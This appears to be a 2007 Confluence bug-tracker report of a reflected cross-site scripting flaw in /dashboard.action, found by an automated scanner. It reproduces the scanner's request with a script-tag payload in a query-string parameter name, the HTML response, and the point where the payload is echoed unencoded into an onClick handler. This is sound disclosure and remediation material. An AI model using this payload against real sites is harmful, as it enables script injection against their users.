Cross-site scripting vulnerability in /dashboard.action

2007-09-25T20:45:01
ID ATLASSIAN:CONFSERVER-9559
Type atlassian
Reporter marois
Modified 2017-02-17T05:09:55

Description

The scanner embedded a script in the response, and it is executed when the page loads in the user's browser, so the application is vulnerable to reflected cross-site scripting. The injection point is the query-string parameter name: /dashboard.action echoes the request's query string, unencoded, into a JavaScript string literal inside the onClick handler of the dashboard tab links (the gotoUrl('/dashboard.action?...') call shown under Validation In Response below). A single quote in the parameter name closes the string literal, the double quote closes the attribute, the angle bracket closes the tag, and the rest of the parameter name is rendered as markup. Because the reflected value is written into a URL, a JavaScript string and an HTML attribute at once, the fix is context-aware output encoding for each of those layers; filtering "hazardous characters" from input, as the scanner report suggests, is not sufficient on its own. As with any reflected XSS, exploitation requires a victim to open a crafted link; the cookies in the request below show the scan itself ran as an authenticated user.

[1 of 3] Cross-Site Scripting in Parameter Name
Severity: High
Test Type: Application
Vulnerable URL: http://xxx.yyy.com:8080/dashboard.action
Remediation Tasks: Filter out hazardous characters from user input
Variant 1 of 2 [ID=2465]

The following changes were applied to the original request:
• Added parameter '>'"><script>alert('Watchfire%20XSS%20Test%20Successful')</script>'

Request/Response (scanner report generated 9/18/2007 1:55:06 PM, page 23/7570):

GET /dashboard.action?>'"><script>alert('Watchfire%20XSS%20Test%20Successful')</script> HTTP/1.1
Cookie: seraph.confluence=Zh\hNiQi[hZiOf]fOm\fOfUgSfZfWkYkWk; confluence.list.pages.cookie=list-recently-updated; confluence.browse.space.cookie=space-pages; JSESSIONID=4DAEC007BFA3515EC02547862F6B66E4
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705; InfoPath.1; .NET CLR 2.0.50727)
Host: xxx.yyyy.com:8080
Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Length: 46506
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Wed, 22 Aug 2007 13:48:24 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Dashboard - MRLwiki TEST</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<script language="javascript">
var contextPath = '';
var i18n = [];
</script>
<link rel="stylesheet" href="/s/809/1/1//styles/mainaction.css" type="text/css" />
<link rel="shortcut icon" href="/images/icons/favicon.ico">
<link rel="icon" type="image/png" href="/images/icons/favicon.png">
<script type="text/javascript" src="/s/809/1//decorators/effects.js"></script>
<link rel="alternate" type="application/rss+xml" title="Dashboard RSS Feed" href="/spaces/createrssfeed.action?types=page&types=blogpost&types=comment&spaces=&sort=modified&title=Dashboard+RSS+Feed&maxResults=15&publicFeed=false&os_authType=basic&rssType=rss2" />
<link rel="alternate" type="application/atom+xml" title="Dashboard RSS Feed" href="/spaces/createrssfeed.action?types=page&types=blogpost&types=comment&spaces=&sort=modified&title=Dashboard+RSS+Feed&maxResults=15&publicFeed=false&os_authType=basic&rssType=atom" />
<script type="text/javascript" src="/scripts/write.js"></script>
</head>
<body onload="placeFocus()">
<script type="text/javascript">
function hideMessage(messageId) {
  var message = document.getElementById(messageId)
  message.style.display = "none";
  setCookie(messageId, true);
}
</script>
<div id="PageContent">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr class="topBar">
<td align="left" width="85%">
<a href="/homepage.action"><img src="/download/userResources/logo" align="absmiddle" border="0"></a>
<span class="topBarDiv"> Dashboard </span>
</td>
<td align="right" valign="middle" style="white-space:nowrap">
<form method="POST" action="/dosearchsite.action" name="searchForm" style="padding: 1px; margin: 1px">
<input type="hidden" name="quickSearch" value="true" />
<input type="hidden" name="searchQuery.spaceKey" value="conf_global" />
<input type="text" accessKey="s" name="searchQuery.queryString" size="25"/>
<input type="submit" value="Search"/>
</form>
</td>
</tr>
<tr>
<td style="padding: 5px" colspan="2">
<table style="padding: 0px; margin: 0px 5px; width: 100%;" cellspacing="0" cellpadding="1" border="0">
<tr>
<td valign="bottom" align="left" width="1%" nowrap>
<span class="logoSpaceLink">   </span>
</td>
<td align="right" valign="top" width="98%">
<span class="smalltext" id="userNavBar">
Welcome <a href="/display/~VULNSCAN"></a> | <a href="/users/viewuserprofile.action?username=VULNSCAN">Preferences</a> | <a href="/logout.action" id="logout">Log Out</a>
</span>
...

Validation In Response:
• Spaces: <li><a href="#" onClick="gotoUrl('/dashboard.action?>'"><script>alert('Watchfire XSS Test Successful')</script>=&spacesSelectedTab=my'); return false;">My</a></li> <li><a href="#

Reasoning: The test successfully embedded a script in the response, which will be executed once the page is loaded in the user's browser. This means that the application is vulnerable to the Cross-Site Scripting attack.